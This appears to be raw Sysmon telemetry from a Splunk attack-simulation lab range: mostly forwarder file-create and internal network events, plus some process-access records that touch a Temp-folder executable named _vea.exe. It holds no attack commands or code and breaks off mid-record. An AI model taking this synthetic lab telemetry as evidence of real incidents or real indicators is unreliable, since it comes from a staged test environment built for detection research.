Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4C821E79FE175D9CBA9F40E90BEA823,SHA256=3890ECF4B5F29E4CB0BA13E2C2F5887866773931C43BF22773AD20E17630D7C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:29.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009FF844C44DF583EA04D1393ADD6315,SHA256=2ECD71EE8C4D9FDC35D5163EA61CDC6FA312FCF65070CE47F03CF0EA336E3777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:29.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F3DFE0395D9C7C8E5D47B826084922B,SHA256=5A1DA606029DA6F82541D134E9A63B51E2CEB96CF85AA7F9059D9B36BE6BC95F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:30.738{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B987B3F14A582145EB5F0D2783EA2B,SHA256=946CEB98B4ABAC14740934F96CE67E2935EC0F62FB4A7F152710CE629C1DD188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:30.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C2E7621CE71C13E47831F7466D434B,SHA256=8C6BA6EBE4A14A0392638242BAD62BCE15717D370ECB4C7E3DD9CCDAF744755C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:30.410{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5EA11C829AB730455D9CFE4BDB613594,SHA256=8E6638B3AE5B5B6B94FA054B1C6504691D3A424F2AD2487AEBC613489361AA1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:28.453{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51549-false10.0.1.12-8000- 23542300x8000000000000000219931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:31.753{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E38EAEE16CFEF74C980FC323713899B,SHA256=87D0BF369ACD8EF8A6413FE74876624929227DBCAF7CA313124C9DD7FD33821D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:31.612{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D51CF52FCB35B319606F39A8E999CD4,SHA256=12A0503451B845B7634062AFD1EFDB452588B5F59FDEE874EBFDD7FF1C3F2873,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:28.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:32.769{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=528102372C0EB49550779F67BA98B270,SHA256=75F4D378C0370CCA95791EC9C4A7BA960F530C92E4E4D0725B055B72392038B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:32.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD14EB0476A467FBC91EF27077DCAF0F,SHA256=1C96795C13BC92CE448F41E751B119459615635AF7B0D8F473B77399A0739899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:33.816{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C84F2458C2E49B4B8D4455421199DE0,SHA256=881E678F0B449DB4191A50CA61FD9966F0A6CEF8169215ED90B3D9DE35E8072F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:33.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2195DE2015F23C3A6ACD11214C6409,SHA256=87E82AD3D0280395CECD7A49F438AC312D63DC43F8772EEF1E466684DFA0B846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:33.488{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=80650C1BD869FAFC00E495FB11517B0C,SHA256=148E14D2B5C0D4737D7F9B4B96298A7AF722C8929CD1FAAD8C67D38794803164,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:34.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC35AFEA9C8D7CEF5271F75542FA8D13,SHA256=E18041EF2606692A65E4C9E406252A07723A74A59F5E2D34831B296251179171,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:34.672{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB4EBD1CBAE23F27B0441F5DAD1690F,SHA256=949E4542A3E1F906DA505750CEA322DD064A84A93BF5D15EFEC8961C31551C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:35.687{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC7F8329FA3CF8A569EDE83A3CFD20A,SHA256=2D284C2650694E4EB3DA0A2973DF76905324BF381C8AF532918AC8F29FD76E8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:33.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51550-false10.0.1.12-8000- 354300x8000000000000000295824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:33.724{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49280-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:36.718{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3509066F25D8833DF582998A8EAA1F0C,SHA256=1A5275289859AA17E1B22FA3D1F9C2480602EB82DD2FD1EE62D49116928EC520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:36.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43857118556F03F30DAF781E66B4E61C,SHA256=9AAD9594C4CE4773BEA0B3337BC9645B70686BB2B0270D98CFA760C558F6FC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:37.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542C8610AC4087FF521DFF562FF92A64,SHA256=0320AE00E286E164A83D7C1DF0A028AA246F442A7C26110C0BA88325B147AFFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:37.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5CBAF8A16CE03BCDDE46CC2631DBE17,SHA256=18A102DE81131F6F97079423BF08F657236EAD4AC1773416D0CF337AAC65883E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:38.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70FF8B2CEC43F8006AA4A739F533919A,SHA256=CAA59BD6DB841A36832A54A7BAA2501F56507F8EB0A0BA2AABB49E0992CE51FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:38.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4840A204E6724EA5C176001D3A76E202,SHA256=7EBCF7D1C86EB482D2F6016061FC5FEE874D49EB15D77C4D750CC06629C4EA7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:39.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AA485433680B5DDB513A31DF941236,SHA256=AF6CABB2315DA3CF80C8DC7216D2D822EEB303BCC37075CDC3246D93B7B1A901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:39.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E2887428E88C5DB923D10F512DF876F,SHA256=BDFB03A2FC447C425788094F3910F463CEC62C882BFF9AF8CA224F0586961E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:40.784{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C5E44D5BAFC1004E6159C584CBB33A,SHA256=19B691EFB88B1A5206048090B1ECA41372DF4DB87280A112E7C0E8631FC0EF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:40.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D600F3B0EA63BE95F5411E9DF397EDE,SHA256=6F9B109AE87BEDB8F0976CD9C00624D8FFBC063E18C13D97F0AD623E54AB7443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:40.254{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:41.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42697780304F098D436A57D55EDBF1DB,SHA256=9A6A0168141991DD565CF020AAAF03D5B4B5696B3E8BB3F5CF5C24CF82A5C85B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:39.609{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51551-false10.0.1.12-8000- 23542300x8000000000000000219941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:41.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA0D6598A354306D6F34819C4E5D629B,SHA256=B1E557C4A3DA6477119F07F6FEBA132F18902328A2B22D7C6392CE809DB42733,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:39.690{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49282-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000295832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:39.658{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49281-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.914{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-15BA-6216-DA06-000000003802}6100C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.914{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-15BA-6216-DA06-000000003802}6100C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.885{C8EA50B7-15BA-6216-DA06-000000003802}61002340C:\Windows\system32\conhost.exe{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.867{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0ACD4ADCEBF793410E64F07627BABEF,SHA256=2696198C2239A8F3D605D9E71F8D89E00B385720E8A97EE92365408CDF0D2176,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.830{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-15BA-6216-DA06-000000003802}6100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.814{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15BA-6216-DA06-000000003802}6100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:42.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDEA9524C257AC95BDB57D9A7C9D257F,SHA256=1196DDB1640D3D5D759487F024B6EE0C2DF672D1783BE4AAC0F207F2D29349A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 